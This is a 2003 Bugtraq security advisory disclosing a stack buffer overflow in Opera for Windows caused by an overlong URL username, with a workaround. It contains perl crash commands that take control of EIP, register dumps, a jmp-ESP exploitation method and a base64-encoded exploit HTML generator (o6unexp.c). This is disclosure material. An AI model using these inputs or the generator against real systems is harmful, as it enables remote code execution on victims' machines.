[28837] in bugtraq
Opera Username Buffer Overflow Vulnerability
daemon@ATHENA.MIT.EDU (nesumin)
Mon Feb 10 12:47:47 2003
Date: Sun, 09 Feb 2003 16:47:46 +0900
From: nesumin <nesumin@softhome.net>
To: bugtraq@securityfocus.com
Message-Id: <20030209163838.73AB.NESUMIN@softhome.net>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="------_3E46057E788A022A1008_MULTIPART_MIXED_"
Content-Transfer-Encoding: 7bit
--------_3E46057E788A022A1008_MULTIPART_MIXED_
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
Hello all.
We release the information about the vulnerability
of Opera, here.
And we wish that this vulnerability is fixed by Vendor,
immediately.
___________________________________________________
--------------------------------------------------------------
Synopsis: Opera Username Buffer Overflow Vulnerability
Product: Opera for Windows
Version: 6.05 build1140 (and Opera7 beta2 build2577)
Vendor: Opera Software ASA (http://www.opera.com/)
Risk: High. Execute arbitrary binary code
Remote: Yes
Local: Yes
Discovered: nesumin <nesumin@softhome.net>
Reported: 2003-02-02
Published: 2003-02-09
--------------------------------------------------------------
Product :
Opera for windows is GUI base WEB Browser.
It has Mail, News, IM client.
Opera Software ASA
http://www.opera.com/
OverView :
Opera6.05 build 1140 (and Opera7 beta2 build 2577) for Windows
has the critical vulnerability.
When Opera will open the URL of HTTP that contains
the "a long username", buffer overflow occurs on the stack.
An attacker can cause it using link(anchor tag),
picture(image tag), frame, script, etc.
Then, it can overwrite saved RET address on stack,
and it enables to execute the arbitrary binary code.
If Opera user opens malicious URL,
they may suffer damage, such as system destruction
and virus infection, etc.
Tested on :
Opera
Opera6.05 build 1140
Opera7 beta2 build 2577
Opera7.00 build 2637
Opera7.01 build 2651
English edition and Japanese edition.
Platform
Windows98SE JP
Windows2000 SP3 JP
WindowsXP SP1 JP
Vulnerable in tested :
Opera6.05 build 1140
Opera7 beta2 build 2577
Unvulnerable in tested :
Opera7.00 build 2637
Opera7.01 build 2651
Vendor status :
Already reported, 2003/02/02.
But we don't know the correspondence and attitude of
Opera Software ASA against this vulnerability
because we didn't have the formal reply from Opera Software ASA.
Solution :
We propose the following temporary method until this vulnerability
is fixed by vendor.
It is the method of deleting two "%s" from the string of
the resource number "21463" in the language file (*.lng).
Thereby, User name and Server name is also no longer displayed
in the URL warning dialog.
Details :
When Opera will open the URL of HTTP Protocol that contains
an user name, it will use the format string of the resource
number "21463" in a language file, and will generate the string
for displaying on the "URL Warning Dialog".
Then Overflow occurs by the Local Buffer on the Stack by
specifying "long user name", because there is not length-check
against the user name.
(The length of the whole URL has restriction)
The RET address can be overwritten by about 2624 characters
(16bits), it depends on the string of "21463".
[Opera6.05 build 1140, english language file]
$ perl -e "exec('opera.exe', 'http://'. 'A' x 2624 .'@/')"
---------------------------------------------------------------------
Exception C0000005
EAX=00410041 EBX=01B5F9BA ECX=0012E254 EDX=01B60E58 ESI=01A8A940
EDI=77DF6001 EBP=0012E278 ESP=0012CDD8 EIP=00423D68 FLAGS=00000216
0012CDD8 00000110 00000001 005F2464 00200020 ........d$_. . .
0012CDE8 00200020 00730055 00720065 0061006E . .U.s.e.r.n.a.
0012CDF8 0065006D 0020003A 00410041 00410041 m.e.:. .A.A.A.A.
0012CE08 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
....
0012E268 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
0012E278 >00410041 00410041 007D0020 007C031E A.A.A.A. .....|.
0012E288 01A8A940 007D02D0 0012E2D8 00000000 @.....}...E.....
---------------------------------------------------------------------
In the above case, Access violation occurs before EIP moves to
the RET address. But EIP is movable by setting the fake values,
0x80000001 or other values to the area which is referred to
after overwritten.
$ perl -e "exec('opera.exe', 'http://'.'%01%e8%80%80' x 1311 .'%ef%bb%be' x 2 .'@/')"
"%01%e8%80%80" = 0x80000001, "%ef%bb%be%ef%bb%be" = 0xfefefefe
(with "Encode all addresses with UTF-8" setting.)
---------------------------------------------------------------------
Exception C0000005
EAX=00000001 EBX=005F2464 ECX=00010101 EDX=F03639D8 ESI=00000001
EDI=00000110 EBP=80000001 ESP=0012E28C *EIP=FEFEFEFE FLAGS=00000202
---------------------------------------------------------------------
ESP register points to the position of the RET address's
offsets value + about 0x10 bytes.
Therefore, It is possible to execute the arbitrary binary code
by overwriting the RET address in the address of the "jmp ESP"
instruction, putting the binary code after the area
which is pointed by ESP register.
In Opera7.0 build 2637 or later, we could not confirm
this vulnerability.
[Note]
The user name written in the buffer by this vulnerability
is changed into 16bit wide characters.
When the setting of "Encode all addresses with UTF-8" is
enabled and the user name encoded by UTF or etc is specified,
the exploit data easily can be set on the stack.
And, If the setting of it is disabled,
It becomes very difficult.
Sample Code : (attached file)
o6unexp.c
This program is the generator that creates Exploit HTML files.
test compiled, Visual C++ 6.
* This source code is only as sample checking vulnerability.
* It is a user's responsibility whatever result is occurred
by this code.
Special thanks :
:: Operash ::
[ Unofficial Opera's Bug and Security information site for Japanese people ]
imagine (Operash webmaster)
melorin
Contacts, Etc :
nesumin <nesumin@softhome.net>
This information does not assure the contents.
We may correct the contents of this information to timely.
We take no responsibility for any damage generated by using
this information.
___________________________________________________
--------------------------------------------------
nesumin <nesumin@softhome.net>
--------_3E46057E788A022A1008_MULTIPART_MIXED_
Content-Type: application/octet-stream; name="o6unexp.c.gz"
Content-Disposition: attachment;
filename="o6unexp.c.gz"
Content-Transfer-Encoding: base64
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
--------_3E46057E788A022A1008_MULTIPART_MIXED_--
